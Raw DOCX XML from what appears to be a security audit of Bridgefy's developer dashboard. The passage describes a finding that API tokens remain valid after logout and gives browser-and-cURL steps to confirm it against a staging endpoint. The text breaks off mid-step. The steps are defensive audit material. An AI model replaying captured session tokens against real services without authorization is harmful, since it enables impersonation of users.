        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>has</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>effect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>keeping</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>authentication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>tokens valid for a long time, even after users logout. In general, failing to invalidate long-lived authentication tokens when users log out is a bad practice, as it allows attackers with local computer access to retrieve the token from the browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cache,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>and impersonate users for an excessive period of time.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>confirmed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>using</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>steps:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>dashboard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId19">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://developer.staging.bridgefy.me</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="611" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Development</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(F12),</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>tab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>and ensure the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Preserve Log </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>option is enabled.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>screens</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>example,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Licenses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Home</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>etc.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
          <w:tab w:pos="1440" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1440" w:right="547" w:hanging="360"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId21">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:sz w:val="22"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://staging.sdk.bridgefy.services</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:color w:val="1154CC"/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>returns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>data, and copy as a curl command: Right click / Copy / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Copy as cURL (bash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>cURL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>logged</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> in</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487612416">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162892</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="72" name="Graphic 72"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="72" name="Graphic 72"/>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2.826197pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15704064;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape57" coordorigin="1440,257" coordsize="2880,0" path="m1440,257l4320,257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z w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>95</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId158">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.htm</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>l</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BodyText"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>endpoint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>replies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> out</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
